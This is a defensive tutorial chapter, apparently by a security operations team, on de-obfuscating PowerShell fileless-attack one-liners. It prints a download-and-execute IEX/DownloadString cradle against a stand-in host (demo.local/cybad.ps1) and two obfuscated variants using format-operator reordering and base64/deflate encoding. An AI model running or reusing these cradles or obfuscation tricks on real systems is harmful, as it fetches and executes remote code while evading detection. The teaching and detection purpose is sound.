In this chapter we role up our sleeves and start getting our hands dirty and analyze two of the common obfuscation techniques – concatenation and based64 encoding

Short Recap

PowerShell is often the tool of choice to fileless malware writers due to its ability to execute processes in memory. In fact, based on our SOC experience, PowerShell easily qualifies as the leading fileless first step.

What we’ll see is an example of how attackers obfuscate one of the most popular in-memory execution cmdlets – IEX (involve-expression)

The IEX cmdlet is a standard alias of invoke-expression, that allows the user to run commands or expressions on the local computer.

Syntax of how to use the invoke-expression cmdlet:

  • Invoke-Expression [-command] string

In the case of fileless attacks, the IEX cmdlet has a big role in the attacker’s malicious scripts. The IEX can be used to run a one liner command that can perform execution of remote malicious script.

In order to understanding the common PowerShell one liner exploits that use IEX cmdlet, we will check the following example:

The above command will download (into the PS memory) an expression from the given URL and execute it via IEX cmdlet, which means that the cybad.ps1 script context will be executed from the PowerShell virtual memory and not from the disk. Fileless techniques are hard to detect with traditional Anti-virus, that scan only files that are stored on the disk.

Above are real scenarios of IEX usage in order to perform a fileless attack, these examples are real commands that are usually used by penetration testers.

So, as a defender in a blue team we can try to monitor PowerShell commands that are running with IEX (invoke-expression) cmdlet, ‘New-Object Net.Webclient’ class and ‘DownloadString’ method in order to find suspicious PowerShell one liners. This may help us to find hints for suspicious fileless attacks that will load a remote script into the PowerShell instance and execute it.

Let’s take our example and break it down in order to figure out what is the suspicious strings to search:

  • IEX(New-Object Net.WebClient).DownloadString(’http://www.demo.local/cybad.ps1’)
    • IEX:
      • Runs commands or expressions on the local computer.
    • New-Object Net.WebClient:
      • Provides common methods for sending data to and receiving data from a resource identified by a URI.
    • DownloadString:
      • Downloads the requested resource as a String. The resource to download may be specified as either String containing the URI or a Uri.

The attackers understand that the IEX cmdlet and the other strings mentioned in the command can expose the malicious activity, so they changed their techniques and started to use a heavy obfuscation in order to hide their commands. This technique allows them to avoid security applications, detection rules, and slow down investigation procedures.

The following commands are the new obfuscated version of the “IEX(New-Object Net.WebClient).DownloadString(’http://www.demo.local/cybad.ps1’)” example.

  • &(“{1}{0}” -f ‘EX’,’I’)(&(“{1}{0}{2}”-f ‘Obje’,’New-‘,’ct’) (“{1}{4}{3}{0}{2}” -f’Clie’,’N’,’nt’,’t.Web’,’e’)).(“{1}{3}{0}{2}” -f ‘trin’,’Downl’,’g’,’oadS’).Invoke((“{1}{5}{2}{4}{3}{0}” -f ‘l/cybad.ps1′,’h’,’ww’,’loca’,’w.demo.’,’ttp://’))
  • ( nEW-ObJeCt sYsTem.Io.COMPression.DeFlATestreAM([IO.MEMorySTREaM] [sYsteM.ConveRT]::fROmbaSE64String(’83SN0FBQ8Est1/VPykpNLgEyS/TCU5OcczJT
    80oUNPVc8svzcvITU4JLijLz0jXsM0pKCqz09cvLy/VSUnPz9XLykxNz9JMrkxJT9AqKDe01AQ==’) ,[io.cOmpresSioN.cOMpREssionMODE]::DECoMPress) |fOrEACH-OBJECt { nEW-ObJeCt iO.StREamreAder($_, [tExt.ENcoDIng]::Ascii ) } |FoREach-ObjeCT { $_.REaDToenD()} ) |.( $SHeLLid[1]+$ShELlid[13]+’x’)

Now if we will try to search for the suspicious strings, we cannot find them due to the obfuscation.

The most important part when we start to de-obfuscate a PowerShell command is to remember that the PowerShell command will read a context in to the memory and execute it, we just want to figure the malicious context and not execute it.

The cmdlet that will execute the malicious context in the memory is the IEX so, first we need to find the IEX and delete it in order safely continue the investigation and de-obfuscate the command.

First de-obfuscation example:

In order to de-obfuscate this command we will use the PowerShell ISE.

The initial steps are to understand which obfuscation techniques were used in order to reverse it to clear text command. Remember we need to find the IEX and delete it.

The first pattern that we can figure is that the obfuscation script is split by brackets ().

  • &(“{1}{0}” -f ‘EX’,’I’)(&(“{1}{0}{2}”-f ‘Obje’,’New-‘,’ct’) (“{1}{4}{3}{0}{2}” -f’Clie’,’N’,’nt’,’t.Web’,’e’)).(“{1}{3}{0}{2}” -f ‘trin’,’Downl’,’g’,’oadS’).Invoke((“{1}{5}{2}{4}{3}{0}” -f ‘l/cybad.ps1′,’h’,’ww’,’loca’,’w.demo.’,’ttp://’))

The second pattern is the curly brackets {} that hold numbers:

  • &(“{1}{0}” -f ‘EX’,’I’)(&(“{1}{0}{2}“-f ‘Obje’,’New-‘,’ct’) (“{1}{4}{3}{0}{2}” -f’Clie’,’N’,’nt’,’t.Web’,’e’)).(“{1}{3}{0}{2}” -f ‘trin’,’Downl’,’g’,’oadS’).Invoke((“{1}{5}{2}{4}{3}{0}” -f ‘l/cybad.ps1′,’h’,’ww’,’loca’,’w.demo.’,’ttp://’))

Furthermore, we can see that the -f is present after each curly bracket.

  • &(“{1}{0}-f ‘EX’,’I’)(&(“{1}{0}{2}-f ‘Obje’,’New-‘,’ct’) (“{1}{4}{3}{0}{2}” -f’Clie’,’N’,’nt’,’t.Web’,’e’)).(“{1}{3}{0}{2}-f ‘trin’,’Downl’,’g’,’oadS’).Invoke((“{1}{5}{2}{4}{3}{0}” -f ‘l/cybad.ps1′,’h’,’ww’,’loca’,’w.demo.’,’ttp://’))

This is the known obfuscation technique that is called “Reordering”. The formatting operator (-f) is dividing the string into several parts and it will reorder them by the curly bracket’s numbers.
The brackets number used as placeholders. In the first view it seemed like a puzzle.

In our case the first bracket holds (“{1}{0}” -f ‘EX’,’I’):

  • {1}=’I’
  • {0}=’EX’

So, if we combine these two strings, the result is ‘IEX’

So now when we know how to deal with the formatting operator (-f), we can check for the next bracket and so on.

The second obfuscation command used different obfuscation technique; it is obfuscating the command by using a base64 string in order to compress the malicious context.

This command uses classes to convert a base64 encoded string to a memory stream. In order to safely decompress this command, first we need to check for the IEX cmdlet.

So, we know that all the first part of the command assessed with compression after this part we can see that we have a pipe ‘|’ and after that we have an unknown command:

  • ( $SHeLLid[1]+$ShELlid[13]+’x’)

This is the IEX cmdlet we need to find, but how do we know that. The trick that is used in this case is using environment variables that holds a string. In this case the $SHeLLid is the environment variable that is used.

So, this variable holds the following string of ‘Microsoft.PowerShell’.

The Square brackets ‘[]’ hold the index number of the sliced string from the variable.

In this way it will combine the IEX cmdlet, I + E + X = IEX.

Afterwards, we have found the IEX, and we can delete it and run the first part of the command in order to decompress the compression and decode the base64 command.

  • Red line represents the methods and properties for compressing and decompressing streams by using the Deflate algorithm.
  • Yellow line represents the convert method of the specified string, which will be used to decode the binary data from base64 digits.
  • White line represents the actual base64 string.
  • Green line represents the IO compression mode.
  • Blue line represents the desired Ascii result from the translation of the base64.

In the following snap you will be able to see the result of the script: